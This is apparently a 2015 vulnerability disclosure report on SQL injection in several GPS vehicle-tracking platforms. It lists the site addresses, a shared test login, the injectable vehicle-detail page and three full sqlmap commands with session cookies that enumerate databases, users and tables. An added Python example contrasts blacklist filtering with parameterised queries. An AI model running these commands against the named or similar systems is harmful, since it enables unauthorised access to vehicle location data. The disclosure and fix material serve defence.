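2015-08-27: Details reported to the vendor; awaiting vendor response
2015-08-30: Vendor confirmed; details disclosed to the vendor only
2015-09-09: Details disclosed to core white hats and experts in related fields
2015-09-19: Details disclosed to regular white hats
2015-09-29: Details disclosed to intern white hats
2015-10-14: Details disclosed to the public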
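SQL injection after test-account login on a location information service management platform (4 platforms & 24 databases & sa account with highest privileges)
http://www.gps199.com/login.aspx account: test, password: 123456
http://www.szpswl.com/Login.aspx account: test, password: 123456
http://www.gpscx.com/index.aspx account: test, password: 123456
http://its666.com/ This platform has no test account; it comes from the same supplier as the previous three, so it should have this vulnerability as well.
On every platform the injection point is the vehicle information detail page: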
http://www.szpswl.com/Functions/data/detailCarInfo.aspx?id=105337
sqlmap.py -u "http://www.gps199.cn/Functions/data/detailCarInfo.aspx?id=105337" --technique E --dbs --cookie "ASP.NET_SessionId=04gtsl35gx43z4exso2j5zu1; GPS_CheckCode_Cookies=5724; .ASPXAUTH=CB877614CCA750A07F3F548411A9CB225BAFFE5A631CF3978D754807765199C1FBAF7B0EAC194974F26DB5A05FAA5F0345F543C1EA7678E2347309670F7280A7DEDECC3E7AAE000641540E4164B773D5E888058BAC733E696607853563EAF92E35BBF36FA224FDDABEBC799E2F223BFF926A1CD8; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+9%3a48%3a23&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530"
sqlmap.py -u "http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377" --users --cookie "ASP.NET_SessionId=ngmmeb55u2o3dg55iwnhizbw; GPS_CheckCode_Cookies=9841; pgv_pvi=4263078912; pgv_si=s768238592; 4006788200slid=slid_352_13%7C; 4006788200mid=545_2; 4006788200mh=1440469736582; 4006788200msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4006788200ik=0; 4006788200is=2; .ASPXAUTH=DC1B908862B0927E69F3AF39567C2FD9DF40C3A64025F50F1A6087796007991F2A0F379EB2CFE5068C5A847C29DEAD9A9A9768F3502490DD6126C8425B898C78FC7DAAE7F5A9BDA65FE18EBD42E83D400354075647410CAFC5AD3E5A3AB5DC497B8EFAB34246D1EFA09BC93969CF5B1363610F97; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+10%3a34%3a05&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530; CookiesReport=ASPXAUTHD2=ASPXAUTHD&Cookie_ClientHeight=448"
sqlmap.py -u "http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377" --tables -D GPSDB_Base --cookie "ASP.NET_SessionId=ngmmeb55u2o3dg55iwnhizbw; GPS_CheckCode_Cookies=9841; pgv_pvi=4263078912; pgv_si=s768238592; 4006788200slid=slid_352_13%7C; 4006788200mid=545_2; 4006788200mh=1440469736582; 4006788200msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4006788200ik=0; 4006788200is=2; .ASPXAUTH=DC1B908862B0927E69F3AF39567C2FD9DF40C3A64025F50F1A6087796007991F2A0F379EB2CFE5068C5A847C29DEAD9A9A9768F3502490DD6126C8425B898C78FC7DAAE7F5A9BDA65FE18EBD42E83D400354075647410CAFC5AD3E5A3AB5DC497B8EFAB34246D1EFA09BC93969CF5B1363610F97; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+10%3a34%3a05&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530; CookiesReport=ASPXAUTHD2=ASPXAUTHD&Cookie_ClientHeight=448"
Filter special characters
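The fix suggested above is to filter special characters. The following added example (not part of the original report) shows why a character blacklist does not protect a numeric id parameter like the one on detailCarInfo.aspx, and what strict integer validation with a bound parameter does instead. Assumptions: the table and column names are hypothetical, the rows are constructed, and SQLite stands in for the platform's SQL Server.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the vehicle table behind detailCarInfo.aspx?id=...

    Table and column names are hypothetical; SQLite replaces SQL Server here.
    """
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE car_info (id INTEGER PRIMARY KEY, company_id INTEGER, plate TEXT)"
    )
    db.executemany(
        "INSERT INTO car_info VALUES (?, ?, ?)",
        [(105337, 1530, "TEST-0001"), (105338, 9999, "OTHER-0002")],
    )
    return db


def strip_special(value):
    """Blacklist approach: drop quotes, semicolons and dashes from the input."""
    return "".join(ch for ch in value if ch not in "'\";-")


def lookup_filtered(db, raw_id):
    # Still injectable: id sits in a numeric context, so the query can be
    # altered without any of the characters the blacklist removes.
    sql = "SELECT id, plate FROM car_info WHERE id = " + strip_special(raw_id)
    return db.execute(sql).fetchall()


def lookup_parameterized(db, raw_id):
    # Hardened: accept only a plain decimal id, then bind it as a parameter
    # so the value can never become part of the SQL text.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a decimal integer")
    return db.execute(
        "SELECT id, plate FROM car_info WHERE id = ?", (int(raw_id),)
    ).fetchall()
```

The report's title also notes that the application reached the database as sa; connecting with a login limited to the application's own database keeps a single injectable page from exposing every database on the server.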
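Severity: High
Vulnerability Rank: 12
Confirmed: 2015-08-30 07:16
The software vendor could not be identified for now, and no direct handling channel with the organization operating the websites has been established; awaiting claim.
None yet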